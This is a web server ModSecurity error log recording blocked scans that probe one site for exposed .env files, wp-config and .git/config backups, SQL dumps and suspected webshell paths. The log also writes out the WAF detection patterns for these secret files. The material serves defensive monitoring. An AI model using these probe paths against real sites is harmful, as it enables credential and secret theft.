[Tue May 26 15:25:08.306271 2026] [security2:error] [pid 707292:tid 707300] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v3/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8RAAA_wc"]
[Tue May 26 15:25:08.452849 2026] [security2:error] [pid 707292:tid 707316] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/var/www/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8WAAAqRc"]
[Tue May 26 15:25:08.508489 2026] [security2:error] [pid 707292:tid 707416] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/var/www/html/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8WQAA_Xs"]
[Tue May 26 15:25:08.515282 2026] [security2:error] [pid 707292:tid 707450] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt_NKAqlRPSIEFAut8IAAAAKE"]
[Tue May 26 15:25:08.559830 2026] [security2:error] [pid 707292:tid 707318] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/web/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8XwAAsxk"]
[Tue May 26 15:25:08.654939 2026] [security2:error] [pid 707292:tid 707305] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/website/.env"] [unique_id "ahVt_NKAqlRPSIEFAut8cgAAuAw"]
[Tue May 26 15:25:08.705411 2026] [security2:error] [pid 707292:tid 707328] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahVt_NKAqlRPSIEFAut8dAAA0SM"]
[Tue May 26 15:25:08.705869 2026] [security2:error] [pid 707292:tid 707328] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.bak"] [unique_id "ahVt_NKAqlRPSIEFAut8dQAA0SM"]
[Tue May 26 15:25:08.732186 2026] [security2:error] [pid 707292:tid 707334] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.new"] [unique_id "ahVt_NKAqlRPSIEFAut8dgAAwCk"]
[Tue May 26 15:25:08.738180 2026] [security2:error] [pid 707292:tid 707308] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahVt_NKAqlRPSIEFAut8eAAArQ8"]
[Tue May 26 15:25:08.741665 2026] [security2:error] [pid 707292:tid 707340] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVt_NKAqlRPSIEFAut8eQAArS8"]
[Tue May 26 15:25:08.753384 2026] [security2:error] [pid 707292:tid 707447] [client 172.202.92.73:46172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/gelay.php"] [unique_id "ahVt_NKAqlRPSIEFAut8fQAAAJ4"]
[Tue May 26 15:25:08.753468 2026] [security2:error] [pid 707292:tid 707447] [client 172.202.92.73:46172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/gelay.php"] [unique_id "ahVt_NKAqlRPSIEFAut8fQAAAJ4"]
[Tue May 26 15:25:09.003027 2026] [security2:error] [pid 707292:tid 707483] [client 195.178.110.199:60936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVt_dKAqlRPSIEFAut8igAAAMI"]
[Tue May 26 15:25:09.187276 2026] [security2:error] [pid 707292:tid 707480] [client 195.178.110.199:60924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.sevenstar.onesoft.in"] [uri "/*update.cgi*"] [unique_id "ahVt_dKAqlRPSIEFAut8lwAAAL8"]
[Tue May 26 15:25:09.191924 2026] [security2:error] [pid 707292:tid 707474] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.docker/.env"] [unique_id "ahVt_dKAqlRPSIEFAut8mwAAALk"]
[Tue May 26 15:25:09.224334 2026] [security2:error] [pid 707292:tid 707490] [client 195.178.110.199:60966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahVt_dKAqlRPSIEFAut8nQAAAMk"]
[Tue May 26 15:25:09.291398 2026] [security2:error] [pid 707292:tid 707511] [client 20.29.64.60:3144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVt_dKAqlRPSIEFAut8nwAAAN4"]
[Tue May 26 15:25:09.337836 2026] [security2:error] [pid 707292:tid 707527] [client 195.178.110.199:32808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahVt_dKAqlRPSIEFAut8pAAAAO4"]
[Tue May 26 15:25:09.498976 2026] [security2:error] [pid 707292:tid 707520] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVt_dKAqlRPSIEFAut8rwAAAOc"]
[Tue May 26 15:25:09.550877 2026] [security2:error] [pid 707292:tid 707440] [client 195.178.110.199:32812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVt_dKAqlRPSIEFAut8uAAAAJc"]
[Tue May 26 15:25:09.723119 2026] [security2:error] [pid 707292:tid 707510] [client 195.178.110.199:60958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVt_dKAqlRPSIEFAut8xgAAAN0"]
[Tue May 26 15:25:10.341275 2026] [proxy:warn] [pid 707292:tid 707507] [client 66.132.195.74:55202] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 15:25:10.341310 2026] [proxy:error] [pid 707292:tid 707507] (70014)End of file found: [client 66.132.195.74:55202] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.195.74 ()
[Tue May 26 15:25:10.476082 2026] [security2:error] [pid 707292:tid 707466] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.old"] [unique_id "ahVt_tKAqlRPSIEFAut82gAAALE"]
[Tue May 26 15:25:10.570927 2026] [security2:error] [pid 707292:tid 707503] [client 195.178.110.199:60962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.php"] [unique_id "ahVt_tKAqlRPSIEFAut85AAAANY"]
[Tue May 26 15:25:10.578390 2026] [security2:error] [pid 707292:tid 707485] [client 195.178.110.199:60998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.swp"] [unique_id "ahVt_tKAqlRPSIEFAut85QAAAMQ"]
[Tue May 26 15:25:10.650447 2026] [security2:error] [pid 707292:tid 707536] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt_tKAqlRPSIEFAut81gAAAPc"]
[Tue May 26 15:25:10.731283 2026] [security2:error] [pid 707292:tid 707496] [client 195.178.110.199:60998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env~"] [unique_id "ahVt_tKAqlRPSIEFAut86wAAAM8"]
[Tue May 26 15:25:11.220803 2026] [security2:error] [pid 707292:tid 707456] [client 20.29.64.60:3142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-plain.php"] [unique_id "ahVt_9KAqlRPSIEFAut9AAAAAKc"], referer: www.google.com
[Tue May 26 15:25:11.956101 2026] [security2:error] [pid 707292:tid 707540] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config.bak"] [unique_id "ahVt_9KAqlRPSIEFAut9GwAAAPs"]
[Tue May 26 15:25:11.962568 2026] [security2:error] [pid 707292:tid 707530] [client 195.178.110.199:32798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config~"] [unique_id "ahVt_9KAqlRPSIEFAut9HQAAAPE"]
[Tue May 26 15:25:12.173540 2026] [security2:error] [pid 707292:tid 707512] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt_9KAqlRPSIEFAut9EAAAAN8"]
[Tue May 26 15:25:12.203409 2026] [security2:error] [pid 707292:tid 707464] [client 195.178.110.199:32814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config.old"] [unique_id "ahVuANKAqlRPSIEFAut9IwAAAK8"]
[Tue May 26 15:25:13.264339 2026] [security2:error] [pid 707292:tid 707465] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/ADMIN/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9aAAAALA"]
[Tue May 26 15:25:13.422819 2026] [security2:error] [pid 707292:tid 707547] [client 195.178.110.199:32814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/APP/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9dQAAAQI"]
[Tue May 26 15:25:13.482297 2026] [security2:error] [pid 707292:tid 707515] [client 195.178.110.199:60924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVuAdKAqlRPSIEFAut9dwAAAOI"]
[Tue May 26 15:25:13.546410 2026] [security2:error] [pid 707292:tid 707542] [client 195.178.110.199:32812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/API/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9eQAAAP0"]
[Tue May 26 15:25:13.567915 2026] [security2:error] [pid 707292:tid 707482] [client 195.178.110.199:32808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BE/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9ewAAAME"]
[Tue May 26 15:25:13.667729 2026] [security2:error] [pid 707292:tid 707461] [client 195.178.110.199:60956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Api/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9gQAAAKw"]
[Tue May 26 15:25:13.719670 2026] [security2:error] [pid 707292:tid 707536] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BACKEND/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9hAAAAPc"]
[Tue May 26 15:25:13.807314 2026] [security2:error] [pid 707292:tid 707496] [client 195.178.110.199:32792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Backend/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9hwAAAM8"]
[Tue May 26 15:25:13.850380 2026] [security2:error] [pid 707292:tid 707522] [client 195.178.110.199:32798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Be/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9iwAAAOk"]
[Tue May 26 15:25:13.914568 2026] [security2:error] [pid 707292:tid 707516] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BACK/.env"] [unique_id "ahVuAdKAqlRPSIEFAut9kgAAAOM"]
[Tue May 26 15:25:14.075246 2026] [security2:error] [pid 707292:tid 707445] [client 20.29.64.60:3151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVuAtKAqlRPSIEFAut9ngAAAJw"]
[Tue May 26 15:25:14.204841 2026] [security2:error] [pid 707292:tid 707471] [client 20.104.227.76:15289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.shahvishaal.moes-art.com"] [uri "/wk/index.php"] [unique_id "ahVuAtKAqlRPSIEFAut9pwAAALY"]
[Tue May 26 15:25:14.380418 2026] [security2:error] [pid 707292:tid 707485] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuAdKAqlRPSIEFAut9lgAAAMQ"]
